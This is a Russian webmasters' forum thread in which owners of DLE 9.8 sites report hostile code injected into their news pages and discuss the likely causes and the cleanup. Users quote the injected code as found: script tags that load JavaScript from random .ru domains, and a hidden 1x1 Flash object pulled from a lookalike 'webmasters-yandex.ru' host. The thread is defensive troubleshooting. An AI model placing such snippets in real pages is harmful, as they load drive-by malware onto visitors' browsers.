Вредоносный код или что?
Страницы: 1 2 3 След.
Вредоносный код или что?
Вообщем заметил, что в некоторых новостях, когда их редактируешь в краткой новости такой код:

<script async="async" type="text/javascript" src="jb2mihuez9025sm8vqgn.ru/356f30b135f0e9d716bec21a02cff1a1.js?in"></script> 

а в полной такой:

<script async="async" type="text/javascript" src="npbceyuwtc.ru/2885d2c5acd9c1537c855f52c47540f1.js?in"></script>

Версия движка 9.8 нулл

Кто-нибудь сталкивался с таким?
  я не админ и не программер а владелец, так что в кодах не шурупаю, но вот что случилось в течении последних трех недель с несколькими моими сайтами.
у меня вообще их много на разных хостингах но 2 сайта расположенные на одном хостинге:
pozitivportal.ru/index.php
kvazar.in.ua
вдруг неожиданно попали в черные списки яндекса с пометкой опасный сайт типа ворующий пароли и бла бла бла. ну и про то что в коде сайта обнаружен троян.
прикол в том что эти сайты созданы на разных движках их делали разные программеры и админят разные админы, они заходят с разных городов и понятно никак не могли занести одновременно туда что то вредоносное, да и за последнее время никаких изменений в коде не производилось.
я всех нахлобучил и они мучались рылись в кодах но так ничего и не обнаружили. и тут меня осенило что бок не в сайтах, а  в серваке)
я глянул в анализаторе соседей по серверу и наугад набил их адреса в яндексе и о чудо)) там было то же самое предупреждения.
все бы ничего но базы яндекса тянут себе браузеры и соцсети, и я оказался отрезан от всего рунэта который юзается яндексом меня все внесли в черные списки и забанили нафиг.
я нахлобучил админов сервака которые мне поначалу парили веселые басни типа попробуй закрыть форточку, выключить микроволновку, включить душ и прочитать заклинание и сайт заработает. я им накидал предьяв.
потом посидел покумекал что ж трапылось то.
оказалось следующее вот скрины, они были сделаны одновременно:
тут вирус есть
savepic.su/3165300.png
тут вируса нет))
savepic.su/3167348.png
я попросил админов сервера пока они там будут бороться с заражением всего сервера просто включить редирект с www на http. и чудо вдруг произошло- опера перестала ругаться. ну и я отправил запрос в яндекс на проверку ботами, он будет длиться несколько дней, но боты просто будут обходить зараженные места на серваке да и все. а потом админы сервака установили новое антивирусное обеспечение и ща обкатывают его. они уже нашли зараженные папки и архивы на куче сайтов и разослали их админам предупреждения, и так корпоративно все админы начали удалять зараженные папки с сервера, думаю за недельку дружненько гахнем трояна, а потом корпоративно начнем искать этого хакера, сайтов тысячи с разных стран. если запеленгуем- найдут в любой стране этого умника.
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Цитата
Дмитрий пишет:
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Скоро обнаружат, лучше уберите пока метку не поставили.
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
Цитата
Алексей SP пишет:
Цитата
Дмитрий пишет:
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Скоро обнаружат, лучше уберите пока метку не поставили.
Уже гугл нашёл smile:( Вот только не понятно как эти коды попали в новость...
Цитата
Дмитрий пишет:
Вот только не понятно как эти коды попали в новость...
вы сами на свой вопрос ответили

Цитата
Дмитрий пишет:
Версия движка 9.8 нулл
Либо как вариант угнан доступ по фтп либо БД, так как в дле, тем более 9,8 запрещена вставка jsкодов непосредственно в новость. Значит код вставляли непосредственно в БД либо через фтп модифицировали файлы для снятия фильтрации кода в новости. Сейчас обнозначно менять все пароли, чистить БД, менять все файлы скрипта на чистые.
у меня такая же проблема, только стоит лицензия. ещё в Статических страницах подобные коды вшиты
тут скорее всего данные от бызы угнаны, нашел пару фалов в папке \engine\cache\system с содержанием текста из dbconfig.php
Изменено: Владимир - 8 Сентября 2013 13:44
Присоединяюсь к Вам, ребята...та же проблема. DLE 9.8, лицензия. Тоже в папке \engine\cache\system сторонние файлы, каких не должно там быть. Сейчас их удаляю, также удаляю скрипты из новостей...
хороший скрипт ( http://terobait48.ru/47-udalyaem-vredonosnyy-kod-skript-iz-dle-avtomaticheskoe-udalenie-freymov-iframe-iz-bazy-dannyh-dle.html )  быстро помог очисть бд новостей от всей этой грязи
Изменено: Владимир - 8 Сентября 2013 13:58
Цитата
Владимир пишет:
terobait48.ru/47-udalyaem-vredonosnyy-kod-skript-iz-dle-avtomaticheskoe-udalenie-freymov-iframe-iz-bazy-dannyh-dle.html]хороший скрипт быстро помог очисть бд новостей от всей этой грязи
Спасибо. Почистить обязательно нужно!Но вот вопрос: когда код появится опять? Конечно нужно и поменять все файлы скрипта на чистые, но хотелось бы знать откуда эта кака появилась... smile:confused:
на сайте сайте дле 10 августа появился Баг Фикс, я его только вчера поставил после того как всё это обнаружилось, может из-за него?
Цитата
Владимир пишет:
на сайте сайте дле 10 августа появился Баг Фикс, я его только вчера поставил после того как всё это обнаружилось, может из-за него?
Да, может быть...сам поздо увидил его
если почистили новости тем скриптом что я писал то ещё в PhpMyAdmin воспользуйтесь поиском по всем таблицам по слову async в пару таблицах тоже нашелся этот код, уже ручками его убирал
В общем все сделал, БД почистил от кода, гугл дал "зеленый"....а сегодня при редактировании в полной и краткой новости опять код, но уже такого вида:
Код
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="webmasters-yandex.ru/flash.swf?1226517021"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="webmasters-yandex.ru/flash.swf63404109" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="www.macromedia.com/go/getflashplayer"></embed></object>
 

где-то дырище, а где - непонятно...smile:confused:
Страницы: 1 2 3 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
07:55 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
07:51 Новая программа монетизации контента VK Видео увеличила доход авторов в 2,5 раза 
23:35 Давайте начнем обмен отзывами Google maps 
17:41 Цифровые часы - модуль DigitalWatch 
23:20 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
17:22 LGaming - экосистема и партнерская программа в gambling и betting вертикалях 
07:42 У Google наблюдается снижение трафика и, как следствие, уменьшение прибыли 
14:58 CoinCapital  
09:28 BestChange – обменивать электронную валюту можно быстро и выгодно 
08:53 Linken Sphere – браузер-антидетект нового поколения 
04:46 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:20 Услуги рассылки Вконтакте 
22:52 Обмен отзывами в яндекс браузере 
22:03 Услуги рассылки Viber|Whatsapp|IMO. 
07:53 НейроБабушка наказывает мошенников 
20:57 Точные прогнозы на футбол 
20:01 Половина скидок на распродажах — фейк 
19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
19:57 Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту 
14:57 Конгресс США заявил о лабораторном происхождении коронавируса 
14:53 Осторожно! Криптовалюта